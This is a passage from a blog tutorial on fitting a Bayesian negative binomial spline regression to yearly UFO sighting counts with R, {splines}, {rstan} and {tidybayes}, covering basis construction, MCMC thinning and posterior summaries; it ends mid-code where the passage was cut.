&lt;p&gt;From a data preparation perspective, the trickiest thing is probably constructing the B-spline basis functions (the other parts of our Stan program can simply be specified). However, the &lt;code&gt;bs()&lt;/code&gt; function from the {splines} package takes the hard work out of this. The following function call constructs our splines for us; we&amp;rsquo;ve specified that we want to use 10 &amp;lsquo;knots&amp;rsquo;, which are a part of the specification of our spline terms. We could try many numbers of knots and use model selection methods to pick the best number (or even model averaging methods), but we later see that 10 knots provides a reasonable fit to the data.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;splines&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;year_range &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;range&lt;/span&gt;(sights_per_year&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;year_of_sighting)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;B &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;bs&lt;/span&gt;(sights_per_year&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;year_of_sighting,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; knots &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq&lt;/span&gt;(from &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year_range[1],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; to &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year_range[2],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; length.out &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; degree &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; intercept &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Once we&amp;rsquo;ve done this, we&amp;rsquo;re basically ready to run our Stan program. All we need to do is collect all of our data together in a list, which we&amp;rsquo;ve called &lt;code&gt;stan_data&lt;/code&gt;.&lt;/p&gt;
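&lt;p&gt;As a quick sanity check on what a basis matrix looks like, the sketch below builds a B-spline basis on a made-up range of years and inspects its shape. The year range, the names &lt;code&gt;toy_knots&lt;/code&gt; and &lt;code&gt;B_toy&lt;/code&gt;, and the use of knots strictly inside the range are assumptions for illustration only. The number of columns should equal the number of knots plus the degree, plus one for the intercept.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;library(splines)

toy_years = 1950:2020
# 8 evenly spaced knots strictly inside the range (illustrative choice)
toy_knots = seq(from = 1950, to = 2020, length.out = 10)[2:9]

B_toy = bs(toy_years, knots = toy_knots, degree = 3, intercept = TRUE)

dim(B_toy)             # one row per year, one column per basis function
range(rowSums(B_toy))  # with an intercept, each row of the basis sums to 1
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Each column of the matrix becomes one regression coefficient in &lt;code&gt;beta&lt;/code&gt;, so the number of columns is the value passed to Stan as &lt;code&gt;K&lt;/code&gt;.&lt;/p&gt;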
&lt;h2 id="performing-the-inferences"&gt;Performing the inferences&lt;/h2&gt;
&lt;p&gt;To perform our inferences, we&amp;rsquo;re going to use Stan with help from {rstan}. {rstan} provides an interface to Stan from R, as well as some other handy features like plotting functions. A bit of trial and error led me to use a thinning factor of 10 in the MCMC scheme, and a warmup period of 1000 proved to be adequate, so we&amp;rsquo;ll use these numbers again and aim to have 4 (approximately) unautocorrelated chains of length 5000. If you&amp;rsquo;ve never used MCMC methods before, we typically specify a warmup (or &amp;ldquo;burn in&amp;rdquo;) period to account for the fact that an MCMC chain must &amp;ldquo;converge&amp;rdquo; to the region of high posterior density from the chain&amp;rsquo;s starting point. The thinning factor is used to account for the fact that Markov chains exhibit a dependence structure (like a time series might); if we keep only every &lt;code&gt;thin&lt;/code&gt;-th iteration, we can reduce, or even eliminate, the autocorrelation in the chain. These steps allow us to better assess the quality of the MCMC scheme and also reduce computational overheads. If we didn&amp;rsquo;t thin, and kept the warmup period, we could end up with a very memory-intensive MCMC chain.&lt;/p&gt;
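&lt;p&gt;To make the warmup and thinning arithmetic concrete, here is a small sketch in base R using the numbers quoted above. The second half uses a simulated AR(1) series as a stand-in for an autocorrelated chain; that series, its coefficient of 0.8 and the helper &lt;code&gt;lag1()&lt;/code&gt; are assumptions for illustration and not output from our model.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;warmup = 1000
thin = 10
target_iter = 5000

# Total iterations per chain so that target_iter draws survive thinning
total_iter = warmup + thin * target_iter
total_iter                    # 51000
(total_iter - warmup) / thin  # 5000 retained draws per chain

# Stand-in for an autocorrelated chain: an AR(1) series with coefficient 0.8
set.seed(42)
chain = as.numeric(arima.sim(model = list(ar = 0.8), n = thin * target_iter))
thinned = chain[seq(thin, length(chain), by = thin)]

# Lag-1 autocorrelation before and after keeping every 10th value
lag1 = function(x) acf(x, lag.max = 1, plot = FALSE)$acf[2]
c(full = lag1(chain), thinned = lag1(thinned))
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In this toy series the lag-1 autocorrelation drops sharply once only every tenth value is kept, which is the effect we are after when thinning real MCMC output.&lt;/p&gt;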
&lt;p&gt;The following code sets these options, assembles the data list and runs the sampler. Our Stan program is in the file &lt;code&gt;stan/nbin_reg.stan&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rstan&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;options&lt;/span&gt;(mc.cores &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;## run chains in parallel (using 4 cores)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;target_iter &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;warmup &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;thin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;total_iter &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; warmup &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; thin &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; target_iter
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;K &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ncol&lt;/span&gt;(B)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;stan_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; N &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;nrow&lt;/span&gt;(sights_per_year),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; K &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; K,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sights_per_year&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;sightings_per_year,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; X &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; B,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# priors&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; m_alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; s_alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; m_beta &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, K),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; s_beta &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, K),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; m_phi &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; s_phi &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;stan&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;stan/nbin_reg.stan&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; stan_data,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; chains &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; iter &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; total_iter,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; warmup &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; warmup,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; thin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; thin
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="making-the-stan-output-a-bit-more-usable"&gt;Making the Stan output a bit more usable&lt;/h3&gt;
&lt;p&gt;The object &lt;code&gt;fit&lt;/code&gt; is a &lt;code&gt;stanfit&lt;/code&gt; object (an S4 class). These can be a bit awkward to work with, but {tidyverse} fans will find the &lt;a href="http://mjskay.github.io/tidybayes/" rel="external"&gt;{tidybayes}&lt;/a&gt; package offers a natural approach to working with MCMC output. Suppose our Stan program performs posterior predictive sampling at the years at which we observed the data via the following &lt;code&gt;generated quantities&lt;/code&gt; block. The &lt;code&gt;_rng&lt;/code&gt; suffix on &lt;code&gt;neg_binomial_2_log_rng&lt;/code&gt; tells us we are performing random sampling from the &lt;code&gt;neg_binomial_2_log&lt;/code&gt; distribution.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-stan" data-lang="stan"&gt;generated quantities {
int y_pred[N];
y_pred = neg_binomial_2_log_rng(log_lambda, exp(log_phi));
}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;We might want to plot summaries of the distribution of &lt;code&gt;y_pred&lt;/code&gt; over time (e.g. posterior quantiles as a function of time). In its raw format, wrangling this data from &lt;code&gt;fit&lt;/code&gt; is a bit clunky. However, the &lt;code&gt;tidybayes::spread_draws()&lt;/code&gt; function makes this simple! The only unusual thing to remember is that, if &lt;code&gt;y_pred&lt;/code&gt; is a vector or array (in Stan), then we need to append &lt;code&gt;[condition]&lt;/code&gt; to the column name (in R) to preserve the fact that &lt;code&gt;y_pred&lt;/code&gt; is many draws of an array of dimension &lt;code&gt;N&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [condition] tells tidybayes to group by index of y_pred&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tidy_fit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; fit &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;spread_draws&lt;/span&gt;(y_pred[condition])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(tidy_fit)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# A tibble: 6 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Groups: condition [1]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; condition y_pred .chain .iteration .draw
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;int&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;dbl&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;int&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;int&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;int&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We see here that, although we only have one &amp;ldquo;statistical&amp;rdquo; variable (&lt;code&gt;y_pred&lt;/code&gt;), we have quite a few pieces of metadata. Firstly, we have &lt;code&gt;condition&lt;/code&gt; - this is the element of &lt;code&gt;y_pred&lt;/code&gt; that we have repeated samples from. &lt;code&gt;.chain&lt;/code&gt; refers to the MCMC chain, &lt;code&gt;.iteration&lt;/code&gt; is the draw &lt;em&gt;within&lt;/em&gt; that chain, and &lt;code&gt;.draw&lt;/code&gt; is essentially a unique id for each row of &lt;code&gt;tidy_fit&lt;/code&gt;. The &lt;code&gt;y_pred&lt;/code&gt; column is the randomly drawn value of &lt;code&gt;y_pred&lt;/code&gt; at the &lt;code&gt;chain&lt;/code&gt;-&lt;code&gt;iteration&lt;/code&gt; combination.&lt;/p&gt;
&lt;p&gt;The nice thing here is that because our Stan output is a &lt;code&gt;tibble&lt;/code&gt;, we can use all of our favourite {tidyverse} tools to summarise the Stan output.&lt;/p&gt;
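&lt;p&gt;As a minimal sketch of that idea, the snippet below builds a small toy tibble with the same columns as &lt;code&gt;tidy_fit&lt;/code&gt; and computes a posterior median and a central 89% interval for each element of &lt;code&gt;y_pred&lt;/code&gt;. The draws are simulated with &lt;code&gt;rnbinom()&lt;/code&gt; purely for illustration; they are not output from the model above, and the names &lt;code&gt;toy_fit&lt;/code&gt; and &lt;code&gt;toy_summary&lt;/code&gt; are hypothetical.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;library(dplyr)

set.seed(1)

# Toy stand-in for tidy_fit: 2 chains x 100 iterations for each of 3 elements
# of y_pred. The values are simulated, NOT draws from the Stan model.
toy_fit = as_tibble(
  expand.grid(condition = 1:3, .chain = 1:2, .iteration = 1:100)
) %&amp;gt;%
  mutate(
    # .draw is a unique id for each chain-iteration combination
    .draw = (.chain - 1L) * 100L + .iteration,
    y_pred = rnbinom(n(), mu = 10 * condition, size = 5)
  ) %&amp;gt;%
  group_by(condition)

# One row per element of y_pred: posterior median and central 89% interval
toy_summary = toy_fit %&amp;gt;%
  summarise(
    median = median(y_pred),
    lower = quantile(y_pred, 0.055, names = FALSE),
    upper = quantile(y_pred, 0.945, names = FALSE)
  )
toy_summary
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Because the toy tibble is grouped by &lt;code&gt;condition&lt;/code&gt;, just as the output of &lt;code&gt;spread_draws()&lt;/code&gt; is, &lt;code&gt;summarise()&lt;/code&gt; returns one row per element without any extra grouping step.&lt;/p&gt;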
&lt;p&gt;For example, to see which years had the largest posterior mean number of sightings, we can use the following snippet:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tidy_fit &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reframe&lt;/span&gt;(mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(y_pred),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year_of_sighting) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;distinct&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;mean) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# A tibble: 5 × 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; condition mean year
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;int&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;dbl&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;dbl&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;45&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;119&lt;/span&gt;. &lt;span style="color:#a5d6ff"&gt;2006&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;44&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;118&lt;/span&gt;. &lt;span style="color:#a5d6ff"&gt;2005&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;46&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;114&lt;/span&gt;. &lt;span style="color:#a5d6ff"&gt;2007&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;43&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;109&lt;/span&gt;. &lt;span style="color:#a5d6ff"&gt;2004&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;47&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;103&lt;/span&gt;. &lt;span style="color:#a5d6ff"&gt;2008&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;From this, we can see that the UFO heyday was the mid 2000s. Of course, plotting the data and predictions will give us a more complete picture. Similar logic would allow us to determine which spline terms are the most important: one approach is to grab the \( \beta\) terms (the coefficients of the spline terms) and order them by \( | E(\beta \mid \mathcal{D}) | \):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fit &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;spread_draws&lt;/span&gt;(beta[condition]) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(mean_beta &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(beta)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
